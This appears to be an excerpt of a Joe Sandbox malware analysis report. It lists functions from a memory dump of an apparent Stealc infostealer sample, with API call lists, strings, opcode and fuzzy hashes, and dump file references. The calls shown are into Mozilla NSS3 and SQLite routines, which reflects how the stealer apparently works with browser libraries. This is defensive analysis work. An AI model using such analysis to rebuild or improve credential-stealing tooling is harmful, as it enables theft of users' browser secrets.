API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 303a42368d480bb18f2b6cbf2b8e47b859f2148fe973a89a5e0369a6e7a6c29f
Instruction ID: 7618da4735b48ac47242782a8ee4a21a2e75549fe1822864a9ff0c82caf142ec
Opcode Fuzzy Hash: 303a42368d480bb18f2b6cbf2b8e47b859f2148fe973a89a5e0369a6e7a6c29f
Instruction Fuzzy Hash: 32410772A001199FEB208E6D9D41BAF37E4AF9535DF050834EC19A7B64E730E915C7E1

Function 6C8A7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F36
free.MOZGLUE(?,?,?,6C8A80DD), ref: 6C8A7F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F5D
DeleteCriticalSection.KERNEL32(?,6C8A80DD), ref: 6C8A7F94
free.MOZGLUE(?), ref: 6C8A7F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C8A80DD), ref: 6C8A7FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C8A80DD), ref: 6C8A7FE6
free.MOZGLUE(?,6C8A80DD), ref: 6C8A802D

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 3066390b62b2acc17fe96a0b8d4323ca89d7a2e5b01eeb8f62298d149330bbf5
Instruction ID: 1b5f25a17ae87ed7e4b2aaf11ebe05df1bdb271782960b2e6c0ee7e55bdbe64b
Opcode Fuzzy Hash: 3066390b62b2acc17fe96a0b8d4323ca89d7a2e5b01eeb8f62298d149330bbf5
Instruction Fuzzy Hash: A0410A71B095904FDF209FBDA988B4A3B75AB4B358F340A39E52983B40D730D906C7A5

Function 6C8EFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8EFF00

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C8EFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C8EFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C8EFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8EFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8EFF8C

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: e42ad96223e37367bbad6251cea47dba7c737a513fbb6b2790778d7029e25c14
Instruction ID: 1cafa9fcbd57d86f85629fd67493a06fa8673666813fe3c3f592141d16f0f496
Opcode Fuzzy Hash: e42ad96223e37367bbad6251cea47dba7c737a513fbb6b2790778d7029e25c14
Instruction Fuzzy Hash: CC3128F29013169BE7308F58AE40B5776A8AFAB388F140935ED2897740FB71D915C7D1

Function 6C8F4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C8F536F,00000022,?,?,00000000,?), ref: 6C8F4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C8F4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C8F4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C8F4FAE
free.MOZGLUE(?), ref: 6C8F4FC8

Strings

%s=%c%s%c, xrefs: 6C8F4FA9
%s=%s, xrefs: 6C8F4F89

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: d49c2e07f1d38b43a3176b7336c57b5e0911431098c06c7e3bb25b0e35a43075
Instruction ID: 7e3ade42c8fb4088d9cca7edde9acbe58ccc28e34966fbe73447a583c65871ec
Opcode Fuzzy Hash: d49c2e07f1d38b43a3176b7336c57b5e0911431098c06c7e3bb25b0e35a43075
Instruction Fuzzy Hash: F6514D21E041498BFB21C96987507FF7BF59FC6398F144927E8B4A7B41D325890787A1

Function 6C837D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C837E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C837E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C837EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C837F2E

Strings

%s at line %d of [%.10s], xrefs: 6C837EE7, 6C837F28
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C837ED8, 6C837F08, 6C837F19
database corruption, xrefs: 6C837EE2, 6C837F23

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 47efe5451cd1ceeee8f7749f09a5c38ae473f371bb59bbbb54b868b26ac1d6c5
Instruction ID: 9a3219e03b35417389342134d64109c71c928383344cb7596340043d6769b9a7
Opcode Fuzzy Hash: 47efe5451cd1ceeee8f7749f09a5c38ae473f371bb59bbbb54b868b26ac1d6c5
Instruction Fuzzy Hash: 1661C470A04255DFDB25CFA9CA90B6A37A2BF45708F146868EC0D5BB51D730EC45CBE1

Function 6C81FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81FE83

Part of subcall function 6C81FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C81FEFA
Part of subcall function 6C81FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C81FF3B

Strings

%s at line %d of [%.10s], xrefs: 6C81FD73, 6C81FE35
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81FD64, 6C81FE26
database corruption, xrefs: 6C81FD6E, 6C81FE30

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: b897264e4f6df72adde155be8adee932745dfaf7bfb3e88e1d0f166d67fa1d8f
Instruction ID: 8bf6b9dd99306829b235a85bbbd8ad23808d55da9c6cfffde882364a9f64ba9e
Opcode Fuzzy Hash: b897264e4f6df72adde155be8adee932745dfaf7bfb3e88e1d0f166d67fa1d8f
Instruction Fuzzy Hash: E0518271A042069FDB14CFA9D9D0AAEB7F1FF58308F144469E905ABB52E731EC50CBA1

Function 6C8A8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C8B124D,00000001), ref: 6C8A8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C8B124D,00000001), ref: 6C8A8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8D73
PR_Unlock.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8D8C

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8DBA

Strings

KRAM, xrefs: 6C8A8CF9
KRAM, xrefs: 6C8A8D3E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: a202dade032c0dab88d27d660cf3f5f520ea43bda7f005ad3ae5ba89357ee44a
Instruction ID: 831ba0c86bc9a134ab7a97874f84096972aa18c4c0d810486047cc2c10b3f723
Opcode Fuzzy Hash: a202dade032c0dab88d27d660cf3f5f520ea43bda7f005ad3ae5ba89357ee44a
Instruction Fuzzy Hash: 9621A1B1A086458FCB10EFB8C68466EBBF0FF55309F158D6AD99887701E734D852CBA1

Function 6C9A0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9A0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9A0EFA

Part of subcall function 6C88AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C88AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C9A0ED9, 6C9A0EE5, 6C9A0F06, 6C9A0F0B
Aborting, xrefs: 6C9A0EB3

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 5497c8ed757cd6ad5b6ea55c3f78e0324099f8df548f2d4783990e1573677512
Instruction ID: a942fd1016e360b36f1c2b6c3c108be93f2b75975cac956ba967e43130bd144e
Opcode Fuzzy Hash: 5497c8ed757cd6ad5b6ea55c3f78e0324099f8df548f2d4783990e1573677512
Instruction Fuzzy Hash: D601C0B6900204BBDF01AFA4DC45C9B3F3CEF4A368B114024FD0A97701D632E96086B2

Function 6C964D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C964DE0

Strings

%s at line %d of [%.10s], xrefs: 6C964DDA
misuse, xrefs: 6C964DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C964DCB
API call with %s database connection pointer, xrefs: 6C964DBD
invalid, xrefs: 6C964DB8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 94913f569c76b235039d22424d0215a26dfda062b679ef6d7d25337a6673442e
Instruction ID: 284d98ec160067ad172add5e41abd2e904fc34d50778cbfdffc2435cd37a06b0
Opcode Fuzzy Hash: 94913f569c76b235039d22424d0215a26dfda062b679ef6d7d25337a6673442e
Instruction Fuzzy Hash: 4CF0B412F149787BEB10819ACD31F86375D4F41359F4609A2EE086BED2E606F89086D2

Function 6C964DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C964E4D

Strings

%s at line %d of [%.10s], xrefs: 6C964E47
misuse, xrefs: 6C964E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C964E38
API call with %s database connection pointer, xrefs: 6C964E2A
invalid, xrefs: 6C964E25

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 783075e0dcfa1071667071c0269aec5b79f6f0f22c7b0004ec23ba824aef3a9d
Instruction ID: 61ef9a11af1af6c79509cd5e42ccd43307e431bef2b5509a18c1dbb4575a6a8f
Opcode Fuzzy Hash: 783075e0dcfa1071667071c0269aec5b79f6f0f22c7b0004ec23ba824aef3a9d
Instruction Fuzzy Hash: 18F0E221F849382BF72280AA9D31FC2378D4B02369F4988A1EA0867FD2D609D86046D3

Function 6C8D0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?,?,00000000,?,?), ref: 6C8D0CB3

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?), ref: 6C8D0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?), ref: 6C8D0DEC

Part of subcall function 6C8F0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C892AF5,?,?,?,?,?,6C890A1B,00000000), ref: 6C8F0F1A
Part of subcall function 6C8F0F10: malloc.MOZGLUE(00000001), ref: 6C8F0F30
Part of subcall function 6C8F0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8F0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000), ref: 6C8D0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?,?,00000000), ref: 6C8D0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0E79

Part of subcall function 6C8E1560: TlsGetValue.KERNEL32(00000000,?,6C8B0844,?), ref: 6C8E157A
Part of subcall function 6C8E1560: EnterCriticalSection.KERNEL32(?,?,?,6C8B0844,?), ref: 6C8E158F
Part of subcall function 6C8E1560: PR_Unlock.NSS3(?,?,?,?,6C8B0844,?), ref: 6C8E15B2

Part of subcall function 6C8AB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C8B1397,00000000,?,6C8ACF93,5B5F5EC0,00000000,?,6C8B1397,?), ref: 6C8AB1CB
Part of subcall function 6C8AB1A0: free.MOZGLUE(5B5F5EC0,?,6C8ACF93,5B5F5EC0,00000000,?,6C8B1397,?), ref: 6C8AB1D2

Part of subcall function 6C8A89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8A88AE,-00000008), ref: 6C8A8A04
Part of subcall function 6C8A89E0: EnterCriticalSection.KERNEL32(?), ref: 6C8A8A15
Part of subcall function 6C8A89E0: memset.VCRUNTIME140(6C8A88AE,00000000,00000132), ref: 6C8A8A27
Part of subcall function 6C8A89E0: PR_Unlock.NSS3(?), ref: 6C8A8A35

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: bd0d86c7dfb6a089dbd121d2d6f659d5c02899fd7c8a6a1f72a3ad53c3203ac6
Instruction ID: a442728ed37dc1b20c7f6e9e5f4a07bcc6ab8af183883d842028db4f887178e9
Opcode Fuzzy Hash: bd0d86c7dfb6a089dbd121d2d6f659d5c02899fd7c8a6a1f72a3ad53c3203ac6
Instruction Fuzzy Hash: 7851C9B5D002155FEB209F68DE81ABB37A89F55218F560934EC05EB702FB31FD1987A2

Function 6C8A9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C8A8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C8B0715), ref: 6C8A8859
Part of subcall function 6C8A8850: PR_NewLock.NSS3 ref: 6C8A8874
Part of subcall function 6C8A8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C8A888D

PR_NewLock.NSS3 ref: 6C8A9CAD

Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5

Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB

TlsGetValue.KERNEL32 ref: 6C8A9CE8
EnterCriticalSection.KERNEL32(?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D01
TlsGetValue.KERNEL32(?,?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D38
EnterCriticalSection.KERNEL32(?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D4D
PR_Unlock.NSS3 ref: 6C8A9D70
PR_Unlock.NSS3 ref: 6C8A9DC3
PR_NewLock.NSS3 ref: 6C8A9DDD

Part of subcall function 6C8A88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8B0725,00000000,00000058), ref: 6C8A8906
Part of subcall function 6C8A88D0: EnterCriticalSection.KERNEL32(?), ref: 6C8A891A
Part of subcall function 6C8A88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C8A894A
Part of subcall function 6C8A88D0: calloc.MOZGLUE(00000001,6C8B072D,00000000,00000000,00000000,?,6C8B0725,00000000,00000058), ref: 6C8A8959
Part of subcall function 6C8A88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8993
Part of subcall function 6C8A88D0: PR_Unlock.NSS3(?), ref: 6C8A89AF

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
